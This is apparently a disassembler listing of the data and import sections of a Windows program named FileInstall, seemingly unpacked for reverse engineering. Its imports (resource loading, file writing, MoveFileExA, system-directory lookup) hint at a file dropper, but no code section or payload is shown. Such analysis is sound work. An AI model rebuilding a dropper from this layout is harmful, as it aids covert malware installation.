aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+47�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+3F�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+2E�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: ___crtMessageBoxA+13�o
align 4
dd 41h dup(0)
asc_4058B8: ; DATA XREF: .data:off_407280�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
dword_405AB8 dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
; DATA XREF: .data:00407284�o
dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
dd 3 dup(100010h), 3 dup(1820182h), 0Ah dup(1020102h)
dd 2 dup(100010h), 10h dup(200020h), 480020h, 8 dup(100010h)
dd 140010h, 100014h, 2 dup(100010h), 100014h, 2 dup(100010h)
dd 1010010h, 0Bh dup(1010101h), 1010010h, 3 dup(1010101h)
dd 0Ch dup(1020102h), 1020010h, 3 dup(1020102h), 1010102h
dword_405CBC dd 0 ; DATA XREF: ___crtLCMapStringA+1C�o
; ___crtGetStringTypeA+1E�o
stru_405CC0 _msEH <0FFFFFFFFh, offset loc_404203, offset loc_404207>
; DATA XREF: ___crtLCMapStringA+2�o
dd 0FFFFFFFFh, 404000h, 404004h, 0FFFFFFFFh, 4040CEh, 4040D2h
dd 0
stru_405CE8 _msEH <0FFFFFFFFh, offset loc_40439F, offset loc_4043A3>
; DATA XREF: ___crtGetStringTypeA+2�o
align 8
stru_405CF8 _msEH <0FFFFFFFFh, offset loc_404955, offset loc_404959>
; DATA XREF: ___convertcp+2�o
align 8
dd 48h, 0Eh dup(0)
dd offset dword_407030
dd offset dword_405DB0
dd 2, 53445352h, 23FC5A73h, 45A28040h, 528197A0h, 0CF18F846h
dd 1
aPProjectsKlikt db 'p:\Projects\Kliktanje\FileInstall\Release\FileInstall.pdb',0
align 10h
dword_405DB0 dd 1598h, 266Ch, 0 ; DATA XREF: .rdata:00405D48�o
dword_405DBC dd 2 dup(0) ; DATA XREF: sub_402154+C�o
; sub_402154:loc_402167�o
dword_405DC4 dd 0 ; DATA XREF: sub_402198+C�o
; sub_402198:loc_4021AB�o
dd 5DF0h, 2 dup(0)
dd 5FCCh, 5000h, 5 dup(0)
dd 5EE0h, 5EEEh, 5EFAh, 5F08h, 5F18h, 5F2Ah, 5F3Ah, 5F4Ah
dd 5F58h, 5F66h, 5F78h, 5F88h, 5F94h, 5FA0h, 5FB6h, 5FDAh
dd 5FE8h, 5FFCh, 600Eh, 6020h, 6030h, 604Ah, 605Ah, 6070h
dd 6086h, 60A0h, 60B4h, 60C8h, 60D8h, 60F4h, 610Eh, 6126h
dd 6140h, 6156h, 6166h, 6180h, 6192h, 61A0h, 61AEh, 61BCh
dd 61CAh, 61D6h, 61E2h, 61F8h, 6208h, 6212h, 621Eh, 622Ah
dd 6236h, 6246h, 6254h, 6260h, 6270h, 6286h, 6296h, 62A8h
dd 62BAh, 62CCh, 62DEh, 0
db 2Eh ; .
align 2
aClosehandle db 'CloseHandle',0
dw 394h
aWritefile db 'WriteFile',0
aM db 'M',0
aCreatefilea db 'CreateFileA',0
db 5Bh ; [
db 2, 4Ch, 6Fh
aCkresource db 'ckResource',0
align 4
db 46h ; F
db 3, 53h, 69h
aZeofresource db 'zeofResource',0
align 2
dw 24Dh
aLoadresource db 'LoadResource',0
align 2
db 'Ú',0
aFindresourcea db 'FindResourceA',0
dw 265h
aMovefileexa db 'MoveFileExA',0
aQ db 'ï',0
aFreelibrary db 'FreeLibrary',0
dw 198h
aGetprocaddress db 'GetProcAddress',0
align 4
db 48h ; H
db 2, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
align 4
db 0ADh ;
db 3, 6Ch, 73h
aTrcata db 'trcatA',0
align 4
db 0B9h ; ¹
db 3, 6Ch, 73h
aTrcpyna db 'trcpynA',0
db 0B9h ; ¹
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 175h
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
aKernel32_dll db 'KERNEL32.dll',0
align 2
aP db '¯',0
aExitprocess db 'ExitProcess',0
db 77h ; w
db 1, 47h, 65h
aTmodulehandlea db 'tModuleHandleA',0
align 4
db 0AFh ; ¯
db 1, 47h, 65h
aTstartupinfoa db 'tStartupInfoA',0
dw 108h
aGetcommandline db 'GetCommandLineA',0
db 0DFh ; ß
db 1, 47h, 65h
aTversionexa db 'tVersionExA',0
db 97h ; —
db 2, 51h, 75h
aEryperformance db 'eryPerformanceCounter',0
dw 1D5h
aGettickcount db 'GetTickCount',0
align 2
dw 13Eh
aGetcurrentthre db 'GetCurrentThreadId',0
align 10h
db 3Bh ; ;
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcessId',0
dw 1C0h
aGetsystemtimea db 'GetSystemTimeAsFileTime',0
db 4Fh ; O
db 3, 54h, 65h
aRminateprocess db 'rminateProcess',0
align 4
db 3Ah ; :
db 1, 47h, 65h
aTcurrentproc_0 db 'tCurrentProcess',0
db 0B1h ; ±
db 1, 47h, 65h
aTstdhandle db 'tStdHandle',0
align 4
db 60h ; `
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 4
aA db 'í',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 14Dh
aGetenvironment db 'GetEnvironmentStrings',0
aU db 'î',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 87h ; ‡
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 169h
aGetlasterror db 'GetLastError',0
align 2
dw 14Fh
aGetenvironme_0 db 'GetEnvironmentStringsW',0
align 10h
dd 65530317h, 6E614874h, 43656C64h, 746E756Fh, 15E0000h
dd 46746547h, 54656C69h, 657079h, 6548020Ah, 65447061h
dd 6F727473h, 2080079h, 70616548h, 61657243h, 6574h, 69560376h
dd 61757472h, 6572466Ch, 20C0065h, 70616548h, 65657246h
dd 2CA0000h, 556C7452h, 6E69776Eh, 21F0064h
aInterlockedexc db 'InterlockedExchange',0
db 7Bh ; {
db 3, 56h, 69h
aRtualquery db 'rtualQuery',0
align 4
db 0F5h ; õ
align 2
aGetacp db 'GetACP',0
align 2
dw 18Bh
aGetoemcp db 'GetOEMCP',0
align 2
dw 0FCh
aGetcpinfo db 'GetCPInfo',0
dw 206h
aHeapalloc db 'HeapAlloc',0
dw 373h
aVirtualalloc db 'VirtualAlloc',0
align 2
dw 210h
aHeaprealloc db 'HeapReAlloc',0
db 12h
db 2, 48h, 65h
aApsize db 'apSize',0
align 10h
db 3Ah ; :
db 2, 4Ch, 43h
aMapstringa db 'MapStringA',0
align 10h
db 6Bh ; k
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 23Bh
aLcmapstringw db 'LCMapStringW',0
align 2
dw 1B2h
aGetstringtypea db 'GetStringTypeA',0
align 4
dd 654701B5h, 72745374h, 54676E69h, 57657079h, 16C0000h
dd 4C746547h, 6C61636Fh, 666E4965h, 416Fh, 69560379h, 61757472h
dd 6F72506Ch, 74636574h, 1BB0000h, 53746547h, 65747379h
dd 666E496Dh
db 6Fh, 0
_rdata ends
; Section 3. (virtual address 00007000)
; Virtual size : 00000838 ( 2104.)
; Section size in file : 00000838 ( 2104.)
; Offset to raw data for section: 00007000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 407000h
dword_407000 dd 0 ; DATA XREF: __cinit+45�o
dd offset ___security_init_cookie
dword_407008 dd 0 ; DATA XREF: __cinit+4C�o
dword_40700C dd 0 ; DATA XREF: __cinit+12�o
dd offset ___onexitinit
dd offset ___initmbctable
dword_407018 dd 0 ; DATA XREF: __cinit+17�o
dword_40701C dd 0 ; DATA XREF: _doexit:loc_40179A�o
dword_407020 dd 0 ; DATA XREF: _doexit+6C�o
dword_407024 dd 0 ; DATA XREF: _doexit:loc_4017B9�o
dword_407028 dd 2 dup(0) ; DATA XREF: _doexit+8B�o
dword_407030 dd 9DAD69AEh ; DATA XREF: WinMain(x,x,x,x)+6�r
; sub_401185�r ...
off_407034 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_407038 dd 2 ; DATA XREF: __NMSG_WRITE+58�r
; __FF_MSGBANNER+E�r
align 10h
dword_407040 dd 2 ; DATA XREF: __NMSG_WRITE:loc_40185A�r
; __NMSG_WRITE+3A�r
off_407044 dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+D5�r
; __NMSG_WRITE+112�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 4056B4h, 9, 405688h, 0Ah, 4055F0h, 10h, 4055C4h
dd 11h, 405594h, 12h, 405570h, 13h, 405544h, 18h, 40550Ch
dd 19h, 4054E4h, 1Ah, 4054ACh, 1Bh, 405474h, 1Ch, 40544Ch
dd 1Dh, 4053A8h, 78h, 405394h, 79h, 405384h, 7Ah, 405374h
dd 0FCh, 405370h, 0FFh, 405360h
dword_4070D8 dd 0C0000005h, 0Bh, 0 ; DATA XREF: __XcptFilter+C�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_407150 dd 3 ; DATA XREF: __XcptFilter+84�r
dword_407154 dd 7 ; DATA XREF: __XcptFilter+89�r
dword_407158 dd 0Ah ; DATA XREF: __XcptFilter+6�r
dword_40715C dd 8Ch ; DATA XREF: __XcptFilter+B2�r
; __XcptFilter+BA�w ...
dd 0FFFFFFFFh, 0A80h, 10h, 0
dword_407170 dd 19930520h, 3 dup(0) ; DATA XREF: .text:0040271B�o
; __NLG_Notify+2�o
byte_407180 db 1 ; DATA XREF: __setmbcp+120�r
db 2, 4, 8
align 8
dword_407188 dd 3A4h ; DATA XREF: __setmbcp:loc_402CC2�r
dword_40718C dd 82798260h ; DATA XREF: __setmbcp+15C�r
dd 21h, 0
dword_407198 dd 0DFA6h ; DATA XREF: __setmbcp+100�r
align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 3 dup(0)
off_407280 dd offset asc_4058B8 ; DATA XREF: _x_ismbbtype+18�r
; __ismbcspace:loc_404C84�r ...
; " ((((( H"
dd offset dword_405AB8+2
dd 1, 0
dword_407290 dd 1 ; DATA XREF: __ismbcspace:loc_404C6F�r
dd 2Eh, 1, 0
; char *dword_4072A0
dword_4072A0 dd 0 ; DATA XREF: start+11C�w
; __setenvp:loc_401BC4�r ...
align 8
dword_4072A8 dd 0 ; DATA XREF: __amsg_exit�r start+D2�r ...
dword_4072AC dd 0 ; DATA XREF: .text:00401411�r
dd 3 dup(0)
dword_4072BC dd 2 ; DATA XREF: start+29�w ___heap_select�r ...
dword_4072C0 dd 0A28h ; DATA XREF: start+49�w start+5A�w
dword_4072C4 dd 501h ; DATA XREF: start+65�w
dword_4072C8 dd 5 ; DATA XREF: start+32�w
; ___heap_select+9�r ...
dword_4072CC dd 1 ; DATA XREF: start+3A�w
dword_4072D0 dd 1 ; DATA XREF: __setargv+8F�w
dword_4072D4 dd 320B20h ; DATA XREF: __setargv+95�w
dd 0
; void *Memory
Memory dd 320B40h ; DATA XREF: __setenvp+48�w
; __setenvp:loc_401C63�r ...
dd 3 dup(0)
off_4072EC dd offset aCM_unpackerPac ; DATA XREF: __setargv+37�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_4072F4 db 0 ; DATA XREF: _doexit+2D�w
align 4
dword_4072F8 dd 1 ; DATA XREF: _doexit+27�w
dword_4072FC dd 1 ; DATA XREF: _doexit+7�r _doexit+B0�w
dword_407300 dd 0 ; DATA XREF: __FF_MSGBANNER+21�r
dword_407304 dd 0 ; DATA XREF: __XcptFilter+68�r
; __XcptFilter+73�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: __setargv+1C�o
; .data:off_4072EC�o
align 4
dd 3Ah dup(0)
byte_40740C db 0 ; DATA XREF: __setargv+23�w
align 10h
dword_407410 dd 1 ; DATA XREF: ___crtGetEnvironmentStringsA+2�r
; ___crtGetEnvironmentStringsA+24�w ...
dword_407414 dd 0 ; DATA XREF: ___crtMessageBoxA+9�r
; ___crtMessageBoxA+38�w ...
dword_407418 dd 0 ; DATA XREF: ___crtMessageBoxA+4D�w
; ___crtMessageBoxA:loc_402352�r
dword_40741C dd 0 ; DATA XREF: ___crtMessageBoxA+5B�w
; ___crtMessageBoxA+D6�r
dword_407420 dd 0 ; DATA XREF: ___crtMessageBoxA+7B�w
; ___crtMessageBoxA:loc_40230D�r
dword_407424 dd 0 ; DATA XREF: ___crtMessageBoxA+6C�w
; ___crtMessageBoxA+9C�r
dword_407428 dd 0 ; DATA XREF: __ValidateEH3RN:loc_4027C1�r
; __ValidateEH3RN+13F�r ...
align 10h
dword_407430 dd 0 ; DATA XREF: __ValidateEH3RN:loc_4027D4�r
; __ValidateEH3RN+1C4�r ...
dd 0Fh dup(0)
dword_407470 dd 0 ; DATA XREF: __ValidateEH3RN+12C�o
; __ValidateEH3RN+191�o ...
dword_407474 dd 1 ; DATA XREF: __setmbcp+19�w
; __setmbcp+21�w ...
align 10h
; int dword_407480
dword_407480 dd 0 ; DATA XREF: ___crtLCMapStringA+265�r
; ___crtGetStringTypeA+14A�r ...
align 10h
; int dword_407490
dword_407490 dd 0 ; DATA XREF: __setmbcp+4F�r
; ___crtLCMapStringA+9D�r ...
align 8
dword_407498 dd 1 ; DATA XREF: ___crtLCMapStringA+E�r
; ___crtLCMapStringA+31�w ...
dword_40749C dd 1 ; DATA XREF: ___crtGetStringTypeA+E�r
; ___crtGetStringTypeA+2E�w ...
dword_4074A0 dd 0 ; DATA XREF: __callnewh�r
dword_4074A4 dd 0 ; DATA XREF: _malloc�r
; _realloc:loc_403E79�r ...
; void *Dst
Dst dd 0 ; DATA XREF: ___sbh_heap_init+21�w
; ___sbh_free_block+21C�r ...
dword_4074AC dd 0 ; DATA XREF: ___sbh_heap_init+28�w
; ___sbh_find_block�r ...
dword_4074B0 dd 0 ; DATA XREF: ___sbh_heap_init+15�w
; ___sbh_find_block+8�r ...
dword_4074B4 dd 0 ; DATA XREF: __heap_alloc+E�r
; ___sbh_heap_init+36�w ...
dword_4074B8 dd 0 ; DATA XREF: ___sbh_heap_init+2F�w
; ___sbh_free_block+300�w ...
dword_4074BC dd 0 ; DATA XREF: ___sbh_heap_init+3C�w
; ___sbh_alloc_new_region+5�r ...
dword_4074C0 dd 0 ; DATA XREF: ___sbh_free_block+229�r
; ___sbh_free_block+249�r ...
; int dword_4074C4
dword_4074C4 dd 0 ; DATA XREF: _setSBCS+1A�w
; _setSBUpLow+84�r ...
dword_4074C8 dd 0 ; DATA XREF: _setSBCS+15�w
; __setmbcp+14D�w ...
dd 5 dup(0)
byte_4074E0 db 0 ; DATA XREF: _setSBCS+6�o __setmbcp+A7�o ...
byte_4074E1 db 0 ; DATA XREF: _parse_cmdline+47�r
; _parse_cmdline+11D�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
; int dword_4075E4
dword_4075E4 dd 4E4h ; DATA XREF: _setSBCS+10�w
; _setSBUpLow+16�r ...
align 10h
dword_4075F0 dd 4 dup(0) ; DATA XREF: _setSBCS+1F�o
; __setmbcp+162�o ...
byte_407600 db 0 ; DATA XREF: _setSBUpLow:loc_402BCD�w
; _setSBUpLow:loc_402BEA�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
dword_407700 dd 320000h ; DATA XREF: __heap_init+19�w
; __heap_init+3E�r ...
dword_407704 dd 1 ; DATA XREF: __heap_init+28�w _free+9�r ...
dword_407708 dd 20h ; DATA XREF: __ioinit+1F�w
; __ioinit:loc_402032�r ...
dd 5 dup(0)
dword_407720 dd 320650h ; DATA XREF: __ioinit:loc_401FC3�w
; __ioinit+3C�r ...
dword_407724 dd 3Fh dup(0) ; DATA XREF: __ioinit+91�o
dword_407820 dd 1 ; DATA XREF: __setenvp+9F�w
dword_407824 dd 320754h ; DATA XREF: _doexit+3E�r
; _doexit:loc_401785�r ...
; void *dword_407828
dword_407828 dd 320758h ; DATA XREF: _doexit+34�r _doexit+5A�r ...
dword_40782C dd 1 ; DATA XREF: __wincmdln+4�r
; __setenvp+3�r ...
dword_407830 dd 0 ; DATA XREF: __cinit�r
dword_407834 dd 142340h ; DATA XREF: start+112�w
; __wincmdln:loc_401B66�r ...
_data ends
; Section 5. (virtual address 00023000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00022400
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 423000h
align 2000h
_idata2 ends
end start